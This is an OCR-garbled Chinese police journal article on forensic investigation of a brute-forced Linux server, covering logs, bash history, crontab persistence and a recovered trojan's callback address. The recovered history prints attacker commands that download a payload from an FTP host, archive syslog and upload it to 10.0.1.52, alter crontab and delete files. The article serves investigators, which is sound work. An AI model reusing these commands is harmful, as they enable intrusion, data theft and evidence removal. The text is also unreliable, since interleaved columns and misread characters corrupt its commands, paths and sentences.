2023年7月8日发(作者：)

—起网站服务器被攻击案件的侦查取证方法研究王李平

孙春雷

代杰

王琛

重庆市公安局大渡口区分局摘

要：为有效打击非法入侵网站的行为，查明侵入者行为，追踪侵入者，以Linux系统为例，对网站服务器一次真实的入侵

行为进行分析，总结侦查思路，方便基层民警提取攻击证据，有效打击网络攻击行为。关®Rlto入侵电子Linux系统析，希望在今后发生类似客非瀏1入Unux服编案件时,

引言随着互联网的快速发展，网络极大方便了我们的曰常

生活，但同时网络安全问题日益突出，网络犯罪行为也呈上

升溜。加强对网站入侵案件电子数据证据的提取和分析，

侦查人员能够第一时间着手分析取证，明确黑客入侵目的,

逆向查找入侵P地址，明确黑客人员身份，顺利破案。二、镜像文件分析(-)系统仿真已成为公安网安部门的重要工作之一。本文结合案例，针对Linux系统需要分析的具体步骤，

使用FTK软件加载镜像文件为本地物理硬盘，然后使用

结合日志文件内容并做出详细的解释，为从事证据提取的侦

查人员砸目关取tim。wnware软件以加载的物理硬盘创建虚拟机登录系统。登录

Unux系统有两种方式：如果有系统密码，输入密码直接登

录；如果没有，则可以采用密码绕过的方式登录系统。(二)系统授权日志信息查看121进入系统后，首先查看A/ar/log/目录下的日志文件

_、准备工作根据公安部《计算机犯罪现场勘验与电子证据检查规

则》之规定叫电子证据数据的采集应该遵循合法性、及时

是否被清空，如果没有被清空，采用命令less

性、全面性和严格管理过程等原则，严格按照规范操作。查看系统日志(如图1所示)，可以得知：系统登通常情况下，发现网站入侵行为后，调查人员到达现

场后首先拔掉可疑计算机的电舷，以防止该机上的数据被

破坏。但是对服务器来说，这种做法并不妥当。首先向有关

责任人和管理、技术人员了解网站类型和拓扑结构，了解服

务器系统情况，原则上采用热备份的方式对电子存储介质复

制或者制作镜像文件。对获取的镜像文件或电子数据进行完

整性校验冏。辖区内一公司报案称，发现其FTP服务器系统于5月

16日被黑客攻击，并上传木马程序，删除日志文件。由于该

图1

B志内容公司服务器托管于电信机房，且＞务器上除了该公司的系统

外还有其它公司的系统在运行，为了不影响服务器上其它系

统的正常运行，我们采取了对存储介质制作镜像文件的方

法，便于后续的分析工作。取证难点：(1

)大多数侦查人

员不熟悉Linux操作系统，对Linux命令更是知之甚微；(2 )

侦查人员对Linux日志文件的存放路径及如何查看存在一定的

难度；(3)侦查人员对木马程序了解甚少。通过本文分

图2暴力破解用户密码成功，并以另外IP登录78置矗曇3

2019年第3期录中存在大量的IP地址10.1.0.7的远程连接失败信息。经过

5时30分执行default,

php文件。If/bin/sh

-e大量的连接尝试失败后，有IP地址10.1.0.52以root用户连接

成功。据此可以判断，有黑客采用了暴力破解的方式获取系

I

This

script

is

executed

at

the

end

of

each

multiuser

runleuel.I

Hake

sure

that

the

script will

"exit

0"

on

success

or

any

otherI

ualue

on

error.统r8t用户的密码（如图2所示）o（三）查看系统登录失败日志文件血昨图3发现以IP地址为10.0.4.7,尝试不同端口进行连接失

败的记录，再次验证了黑客对服务器进行了密码暴力破解。I

In

order

to

enable

or

disable

this

script

just

change

the

executionI

bits.I

By defauIt

this

script

does

nothing./usrzloca1/apache/b

in/apachect1

-k start-etc/init.d/php

-k start■etc/init.d/zxcc

start-etc/init.d/AUTHORS start^etc/init.d/signal start图5

文件内容rootP（none）:/etc#

less

crontabI

/etc/crontab：

system-wide

crontabI

Unlike

any

other crontab

you

don't

have

to

run

the

'crontab*I

command

to

install the

neu

version

when

you

edit

this

fileI

and

files

in

zetc/cron.d.

These

files

also

have

username

fields,

I

that

none

of

the

other

crontabs

=/bin/shPATH=zzusr/loca

1/sb

in:/usr/local/bin:/sbin:/bin：zusr/sbin：/usr/b inI

m

h

don non

dou

user

25

6 * *

*

root17

6

»

»

7

root5Z

6

1

*

*

root7 * *

*

root30

5 * *

*

root图3连接失败记录t_______commandcd

/

run-parts

—report zetc/

cd

/

&&

run-parts

—report

/etc/

cd

/

run-parts

report

zctc/y

ztnp/tnp/zxcccd

/

&&

run-partsphp

/uar/uuu/htni1zdefau }'州册〔■咄谢（四）查看操作命令日志文件.bash_history通过查看.bash_history文件，可以得到操作者在本服务图6

cronlab文件内容（六）使用R-studio软件器上者腋用了何不険。cd

/tupwget

代》>:〃10.0.1.52八110.2丄|> --ftp-user-Tim

--ftp-password_timl990unzip

-d

tmp

tmp./zxcccd

/var/logtar

-zcvf

/tmp/

syslogwput

£tp://Tim:tii»199agl0.0.1.52/apt

install wputwput

代0：//71»:上1»1998810.0.1.52/cd

/var/www/htmlwget

£5：〃”1»:"|»1998810.0.1-52/血也1111：-|}2cd

/vim

/etc/im

/etc/crontabcd /rm

/tmp/

/tnp/eroff对镜像文件进行恢复扫描得到删除的

和文件，对文件解压缩得到zxcc文件，并进行

分析。该文件疑似木马文件，反向IP为192.168.31.164,端口

号为6688。三、结论本文首先分析了黑客如何获取系统密码，并以另外一

地址登录服务器；然后分析了黑客登录系统后在服务器上进

图4

.bash_history文件内容行了何种命令操作，并分析了这些操作的具体功能；最后恢

复了删除的文件，并从中找到了木马回传的IP地址。此次

1.

首先进入tmp目录，从FTP

（

IP地址1001.52

）上以

用户名Tim、密码tim1990下载压缩包，并解压。进

Linux服务器真实案例的分析，使侦查取证人员对此类案件

ASltrnp/brip目录，执行zxcc文件。2.

进入到A/ar/log目录，将syslog文件打包到目录/tmp

形成了初步认识，学习了快速提取黑客入侵和被攻击内容的

方法，为案件侦查提供了有力支撑。曰下，文件名为

,并将

文件上传到以用户名71m登录的FTP

（

IP地址10.0.1.52）

上。上传失败，安装wput命令包后再次上传。参考文献[1]公信安[2005J161号计算机犯罪现场勘验与电子证据检查规

3.

进入到/var/vvvvw/htiTil

g录，从上述FTP±下载

文件。则同.[23刘宇,汤锦淮•

Linux系统通用取证方法研究DJ.信息网络安全，

2010（3）:31-33.4.

修改/etc/目录下的和crontab文件。5.

删除Arp/目录下的

和文件。[3]

赖世峰，王江海•黑客非法侵入案件的电子取证分析Q].警察

技术,2018（1）:61-62.[4]

刘晓丽，徐博赫•基于Linux系统的网络入侵取证方法与实践几

网络安全技术与应用^016（10）:34-35.[5]

庄建儿.非法入侵网站案件的电子取证分析[J].宁波大学学

6.

关机。（五）查看和crontab文件内容分别如图5和图6所示。从图5可知，开启了php和

zxcc服务；从图6可知，每天7时50分执行zxcc文件和每天报（理工版）,2012.25（4）:55-58.[6]

手艺人123.

Linux隐匿和清除的几条命令[N/OL].

CSDN论坛,

/vgy397Zartide/detafls/

Technology

2019年第3期

79